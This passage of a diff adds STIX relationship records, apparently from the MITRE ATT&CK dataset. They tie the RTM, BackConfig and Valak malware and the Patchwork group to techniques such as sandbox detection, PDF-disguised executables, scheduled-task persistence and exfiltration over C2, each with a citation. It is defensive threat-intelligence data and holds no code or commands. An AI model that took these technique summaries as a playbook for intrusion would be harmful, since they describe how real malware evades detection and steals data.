+ "description": "[RTM](https://attack.mitre.org/software/S0148) has named the scheduled task it creates \"Windows Update\".(Citation: Unit42 Redaman January 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--874d4046-5b9a-4f60-88f4-79ae63a70a1e",
+ "type": "relationship",
+ "modified": "2020-06-16T20:51:13.038Z",
+ "created": "2020-06-16T20:51:13.038Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
+ "target_ref": "attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d",
+ "external_references": [
+ {
+ "source_name": "Unit42 Redaman January 2019",
+ "url": "https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/",
+ "description": "Duncan, B., Harbison, M. (2019, January 23). Russian Language Malspam Pushing Redaman Banking Malware. Retrieved June 16, 2020."
+ }
+ ],
+ "description": "[RTM](https://attack.mitre.org/software/S0148) can detect if it is running within a sandbox or other virtualized analysis environment.(Citation: Unit42 Redaman January 2019)\t",
+ "relationship_type": "uses",
+ "id": "relationship--73d5e6ab-9d0c-4884-9db0-02033523e61a",
+ "type": "relationship",
+ "modified": "2020-06-16T20:51:13.040Z",
+ "created": "2020-06-16T20:51:13.040Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
+ "target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "external_references": [
+ {
+ "source_name": "Unit42 Redaman January 2019",
+ "url": "https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/",
+ "description": "Duncan, B., Harbison, M. (2019, January 23). Russian Language Malspam Pushing Redaman Banking Malware. Retrieved June 16, 2020."
+ }
+ ],
+ "description": "[RTM](https://attack.mitre.org/software/S0148) has relied on users opening malicious email attachments, decompressing the attached archive, and double-clicking the executable within.(Citation: Unit42 Redaman January 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--e0b775d4-cfc4-4075-a72b-6a866ef3c159",
+ "type": "relationship",
+ "modified": "2020-06-16T20:51:13.210Z",
+ "created": "2020-06-16T20:51:13.210Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
+ "target_ref": "attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0",
+ "external_references": [
+ {
+ "source_name": "Unit42 Redaman January 2019",
+ "url": "https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/",
+ "description": "Duncan, B., Harbison, M. (2019, January 23). Russian Language Malspam Pushing Redaman Banking Malware. Retrieved June 16, 2020."
+ }
+ ],
+ "description": "[RTM](https://attack.mitre.org/software/S0148) has been delivered as archived Windows executable files masquerading as PDF documents.(Citation: Unit42 Redaman January 2019)\t",
+ "relationship_type": "uses",
+ "id": "relationship--f981c633-9333-4c7d-a168-7bea28f64d52",
+ "type": "relationship",
+ "modified": "2020-06-16T20:51:13.213Z",
+ "created": "2020-06-16T20:51:13.213Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
+ "target_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597",
+ "external_references": [
+ {
+ "source_name": "Unit42 Redaman January 2019",
+ "url": "https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/",
+ "description": "Duncan, B., Harbison, M. (2019, January 23). Russian Language Malspam Pushing Redaman Banking Malware. Retrieved June 16, 2020."
+ }
+ ],
+ "description": "[RTM](https://attack.mitre.org/software/S0148) has been delivered via spearphishing attachments disguised as PDF documents.(Citation: Unit42 Redaman January 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--2b948c49-f65d-4e60-969f-229030b4d311",
+ "type": "relationship",
+ "modified": "2020-06-16T20:51:13.228Z",
+ "created": "2020-06-16T20:51:13.228Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--e3388c78-2a8d-47c2-8422-c1398b324462",
+ "target_ref": "attack-pattern--8d7bd4f5-3a89-4453-9c82-2c8894d5655e",
+ "relationship_type": "mitigates",
+ "description": "Remove vulnerable Group Policy Preferences.(Citation: Microsoft MS14-025)",
+ "id": "relationship--b3a191f3-59be-4457-ad5c-085ea0391bfe",
+ "external_references": [
+ {
+ "source_name": "Microsoft MS14-025",
+ "description": "Microsoft. (2014, May 13). MS14-025: Vulnerability in Group Policy Preferences could allow elevation of privilege. Retrieved January 28, 2015.",
+ "url": "http://support.microsoft.com/kb/2962486"
+ }
+ ],
+ "type": "relationship",
+ "modified": "2020-06-17T14:25:38.427Z",
+ "created": "2020-06-17T13:45:45.043Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--c13d9621-aca7-436b-ab3d-3a95badb3d00",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "source_name": "Unit 42 BackConfig May 2020",
+ "url": "https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/",
+ "description": "Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020."
+ }
+ ],
+ "description": "[BackConfig](https://attack.mitre.org/software/S0475) has the ability to use HTTPS for C2 communiations.(Citation: Unit 42 BackConfig May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--c3086516-a419-4e7f-87c4-e37f08d0f27a",
+ "type": "relationship",
+ "modified": "2020-06-29T15:22:59.188Z",
+ "created": "2020-06-17T20:39:12.746Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--c13d9621-aca7-436b-ab3d-3a95badb3d00",
+ "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "external_references": [
+ {
+ "source_name": "Unit 42 BackConfig May 2020",
+ "url": "https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/",
+ "description": "Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020."
+ }
+ ],
+ "description": "[BackConfig](https://attack.mitre.org/software/S0475) has used a custom routine to decrypt strings.(Citation: Unit 42 BackConfig May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--e823be4b-50b9-4430-9010-e960b46bdfcc",
+ "type": "relationship",
+ "modified": "2020-06-17T20:39:12.751Z",
+ "created": "2020-06-17T20:39:12.751Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--c13d9621-aca7-436b-ab3d-3a95badb3d00",
+ "target_ref": "attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9",
+ "external_references": [
+ {
+ "source_name": "Unit 42 BackConfig May 2020",
+ "url": "https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/",
+ "description": "Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020."
+ }
+ ],
+ "description": "[BackConfig](https://attack.mitre.org/software/S0475) has compromised victims via links to URLs hosting malicious content.(Citation: Unit 42 BackConfig May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--efcd3e1b-d17b-4c7f-97fd-b438ebef6760",
+ "type": "relationship",
+ "modified": "2020-06-29T15:22:59.285Z",
+ "created": "2020-06-17T20:39:12.755Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
+ "target_ref": "attack-pattern--e3b6daca-e963-4a69-aee6-ed4fd653ad58",
+ "external_references": [
+ {
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "source_name": "ESET RTM Feb 2017"
+ }
+ ],
+ "description": "[RTM](https://attack.mitre.org/software/S0148) can scan victim drives to look for specific banking software on the machine to determine next actions.(Citation: ESET RTM Feb 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--f60ed279-c720-4906-9e63-3cd7ce49e1e0",
+ "type": "relationship",
+ "modified": "2020-06-18T16:12:54.219Z",
+ "created": "2020-06-18T16:12:54.219Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
+ "target_ref": "attack-pattern--232a7e42-cd6e-4902-8fe9-2960f529dd4d",
+ "external_references": [
+ {
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "source_name": "ESET RTM Feb 2017"
+ }
+ ],
+ "description": "[RTM](https://attack.mitre.org/software/S0148) can search for specific strings within browser tabs using a Dynamic Data Exchange mechanism.(Citation: ESET RTM Feb 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--6975d10a-91bf-4a22-8353-745de444c594",
+ "type": "relationship",
+ "modified": "2020-06-18T16:12:54.239Z",
+ "created": "2020-06-18T16:12:54.239Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
+ "target_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "external_references": [
+ {
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "source_name": "ESET RTM Feb 2017"
+ }
+ ],
+ "description": "[RTM](https://attack.mitre.org/software/S0148) can use the FindNextUrlCacheEntryA and FindFirstUrlCacheEntryA functions to search for specific strings within browser history.(Citation: ESET RTM Feb 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--9ae8ed36-348a-4053-bfa2-81fd0cc774aa",
+ "type": "relationship",
+ "modified": "2020-06-18T16:12:54.243Z",
+ "created": "2020-06-18T16:12:54.243Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--c13d9621-aca7-436b-ab3d-3a95badb3d00",
+ "target_ref": "attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d",
+ "external_references": [
+ {
+ "source_name": "Unit 42 BackConfig May 2020",
+ "url": "https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/",
+ "description": "Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020."
+ }
+ ],
+ "description": "[BackConfig](https://attack.mitre.org/software/S0475) has the ability to set folders or files to be hidden from the Windows Explorer default view.(Citation: Unit 42 BackConfig May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--bf0fd2a9-0852-4a4e-a806-281c0a7d63e3",
+ "type": "relationship",
+ "modified": "2020-06-18T17:27:09.295Z",
+ "created": "2020-06-18T17:27:09.295Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--c13d9621-aca7-436b-ab3d-3a95badb3d00",
+ "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
+ "external_references": [
+ {
+ "source_name": "Unit 42 BackConfig May 2020",
+ "url": "https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/",
+ "description": "Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020."
+ }
+ ],
+ "description": "[BackConfig](https://attack.mitre.org/software/S0475) has the ability to remove files and folders related to previous infections.(Citation: Unit 42 BackConfig May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--73d8feea-0b53-419a-be1b-5750aa47f2df",
+ "type": "relationship",
+ "modified": "2020-06-18T17:27:09.323Z",
+ "created": "2020-06-18T17:27:09.323Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--c13d9621-aca7-436b-ab3d-3a95badb3d00",
+ "target_ref": "attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
+ "external_references": [
+ {
+ "source_name": "Unit 42 BackConfig May 2020",
+ "url": "https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/",
+ "description": "Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020."
+ }
+ ],
+ "description": "[BackConfig](https://attack.mitre.org/software/S0475) has the ability to use scheduled tasks to repeatedly execute malicious payloads on a compromised host.(Citation: Unit 42 BackConfig May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--c0417cdc-0451-41e3-8937-88e9ebd68d1a",
+ "type": "relationship",
+ "modified": "2020-06-29T15:59:07.632Z",
+ "created": "2020-06-18T17:27:09.352Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--c13d9621-aca7-436b-ab3d-3a95badb3d00",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "Unit 42 BackConfig May 2020",
+ "url": "https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/",
+ "description": "Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020."
+ }
+ ],
+ "description": "[BackConfig](https://attack.mitre.org/software/S0475) has used compressed and decimal encoded VBS scripts.(Citation: Unit 42 BackConfig May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--b82ea861-86df-4574-9727-f0d5828e9fe8",
+ "type": "relationship",
+ "modified": "2020-06-18T17:27:09.381Z",
+ "created": "2020-06-18T17:27:09.381Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--c13d9621-aca7-436b-ab3d-3a95badb3d00",
+ "target_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
+ "external_references": [
+ {
+ "source_name": "Unit 42 BackConfig May 2020",
+ "url": "https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/",
+ "description": "Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020."
+ }
+ ],
+ "description": "[BackConfig](https://attack.mitre.org/software/S0475) has used VBS to install its downloader component and malicious documents with VBA macro code.(Citation: Unit 42 BackConfig May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--0614fc3b-614c-4d50-9ae2-ab526160faf5",
+ "type": "relationship",
+ "modified": "2020-06-24T20:29:46.211Z",
+ "created": "2020-06-18T17:27:09.385Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--c13d9621-aca7-436b-ab3d-3a95badb3d00",
+ "target_ref": "attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21",
+ "external_references": [
+ {
+ "source_name": "Unit 42 BackConfig May 2020",
+ "url": "https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/",
+ "description": "Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020."
+ }
+ ],
+ "description": "[BackConfig](https://attack.mitre.org/software/S0475) has the ability to use hidden columns in Excel spreadsheets to store executable files or commands for VBA macros.(Citation: Unit 42 BackConfig May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--66ce5052-08d8-4160-a8c9-f3e6b9e5cd1f",
+ "type": "relationship",
+ "modified": "2020-06-29T15:22:59.269Z",
+ "created": "2020-06-18T17:27:09.388Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--17862c7d-9e60-48a0-b48e-da4dc4c3f6b0",
+ "target_ref": "malware--c13d9621-aca7-436b-ab3d-3a95badb3d00",
+ "external_references": [
+ {
+ "source_name": "Unit 42 BackConfig May 2020",
+ "url": "https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/",
+ "description": "Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020."
+ }
+ ],
+ "description": "(Citation: Unit 42 BackConfig May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--8b2625de-8de9-4216-8805-d1e75093b098",
+ "type": "relationship",
+ "modified": "2020-06-18T17:29:43.758Z",
+ "created": "2020-06-18T17:29:43.758Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--17862c7d-9e60-48a0-b48e-da4dc4c3f6b0",
+ "target_ref": "attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082",
+ "external_references": [
+ {
+ "source_name": "Unit 42 BackConfig May 2020",
+ "url": "https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/",
+ "description": "Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020."
+ }
+ ],
+ "description": "[Patchwork](https://attack.mitre.org/groups/G0040) has signed malware with self signed certificates from fictitious and spoofed legitimate software companies.(Citation: Unit 42 BackConfig May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--1576ad32-c7cc-45af-b39e-410d96a6f908",
+ "type": "relationship",
+ "modified": "2020-06-18T17:45:26.363Z",
+ "created": "2020-06-18T17:45:26.363Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ade37ada-14af-4b44-b36c-210eec255d53",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "Cybereason Valak May 2020",
+ "url": "https://www.cybereason.com/blog/valak-more-than-meets-the-eye",
+ "description": "Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020."
+ }
+ ],
+ "description": "[Valak](https://attack.mitre.org/software/S0476) has the ability to base64 encode and XOR encrypt strings.(Citation: Cybereason Valak May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--25b8b66a-a9d0-4400-8b41-dd12208a25de",
+ "type": "relationship",
+ "modified": "2020-06-19T19:08:40.295Z",
+ "created": "2020-06-19T19:08:40.295Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ade37ada-14af-4b44-b36c-210eec255d53",
+ "target_ref": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d",
+ "external_references": [
+ {
+ "source_name": "Cybereason Valak May 2020",
+ "url": "https://www.cybereason.com/blog/valak-more-than-meets-the-eye",
+ "description": "Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020."
+ }
+ ],
+ "description": "[Valak](https://attack.mitre.org/software/S0476) has the ability to exfiltrate data over the C2 channel.(Citation: Cybereason Valak May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--8ae91ec7-32ed-46a2-9bc2-1c7b856c3cc7",
+ "type": "relationship",
+ "modified": "2020-06-22T23:46:45.205Z",
+ "created": "2020-06-19T19:08:40.368Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ade37ada-14af-4b44-b36c-210eec255d53",
+ "target_ref": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688",
+ "external_references": [
+ {
+ "source_name": "Cybereason Valak May 2020",
+ "url": "https://www.cybereason.com/blog/valak-more-than-meets-the-eye",
+ "description": "Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020."
+ }
+ ],
+ "description": "[Valak](https://attack.mitre.org/software/S0476) has the ability to take screenshots on a compromised host.(Citation: Cybereason Valak May 2020)\t ",
+ "relationship_type": "uses",
+ "id": "relationship--5797b454-e7cc-45a3-9bf1-7708d7286531",
+ "type": "relationship",
+ "modified": "2020-06-19T19:08:40.372Z",
+ "created": "2020-06-19T19:08:40.372Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ade37ada-14af-4b44-b36c-210eec255d53",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "source_name": "Cybereason Valak May 2020",
+ "url": "https://www.cybereason.com/blog/valak-more-than-meets-the-eye",
+ "description": "Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020."
+ }
+ ],
+ "description": "[Valak](https://attack.mitre.org/software/S0476) has used HTTP in communications with C2.(Citation: Cybereason Valak May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--4143e83e-40a1-4d10-babf-9affba3cb101",
+ "type": "relationship",
+ "modified": "2020-06-19T19:08:40.375Z",
+ "created": "2020-06-19T19:08:40.375Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ade37ada-14af-4b44-b36c-210eec255d53",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "source_name": "Cybereason Valak May 2020",
+ "url": "https://www.cybereason.com/blog/valak-more-than-meets-the-eye",
+ "description": "Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020."
+ }
+ ],
+ "description": "[Valak](https://attack.mitre.org/software/S0476) can determine the Windows version on a compromised host.(Citation: Cybereason Valak May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--7b4e1a93-99ca-444d-bfc4-bc589a9a25a9",
+ "type": "relationship",
+ "modified": "2020-06-19T19:08:40.378Z",
+ "created": "2020-06-19T19:08:40.378Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ade37ada-14af-4b44-b36c-210eec255d53",
+ "target_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736",
+ "external_references": [
+ {
+ "source_name": "Cybereason Valak May 2020",
+ "url": "https://www.cybereason.com/blog/valak-more-than-meets-the-eye",
+ "description": "Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020."
+ }
+ ],
+ "description": "[Valak](https://attack.mitre.org/software/S0476) has used PowerShell to download additional modules.(Citation: Cybereason Valak May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--e2c05732-0721-4836-aa07-52f4c379b361",
+ "type": "relationship",
+ "modified": "2020-06-19T19:08:40.373Z",
+ "created": "2020-06-19T19:08:40.373Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ade37ada-14af-4b44-b36c-210eec255d53",
+ "target_ref": "attack-pattern--21875073-b0ee-49e3-9077-1e2a885359af",
+ "external_references": [
+ {
+ "source_name": "Cybereason Valak May 2020",
+ "url": "https://www.cybereason.com/blog/valak-more-than-meets-the-eye",
+ "description": "Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020."
+ }
+ ],
+ "description": "[Valak](https://attack.mitre.org/software/S0476) has the ability to enumerate domain admin accounts.(Citation: Cybereason Valak May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--d4faeb90-07ee-4ae2-b77d-e002418d1b22",
+ "type": "relationship",
+ "modified": "2020-06-22T23:46:45.341Z",
+ "created": "2020-06-19T19:08:40.383Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ade37ada-14af-4b44-b36c-210eec255d53",
+ "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "external_references": [
+ {
+ "source_name": "Cybereason Valak May 2020",
+ "url": "https://www.cybereason.com/blog/valak-more-than-meets-the-eye",
+ "description": "Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020."
+ }
+ ],
+ "description": "[Valak](https://attack.mitre.org/software/S0476) has the ability to decode and decrypt downloaded files.(Citation: Cybereason Valak May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--b99e218f-942b-4643-b4de-35649d2a4cbd",
+ "type": "relationship",
+ "modified": "2020-06-19T19:08:40.385Z",
+ "created": "2020-06-19T19:08:40.385Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ade37ada-14af-4b44-b36c-210eec255d53",
+ "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0",
+ "external_references": [
+ {
+ "source_name": "Cybereason Valak May 2020",
+ "url": "https://www.cybereason.com/blog/valak-more-than-meets-the-eye",
+ "description": "Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020."
+ }
+ ],
+ "description": "[Valak](https://attack.mitre.org/software/S0476) has the ability to identify the MAC and IP addresses of an infected machine.(Citation: Cybereason Valak May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--93169fdc-7afd-41b9-90bc-54d99c1c86e6",
+ "type": "relationship",
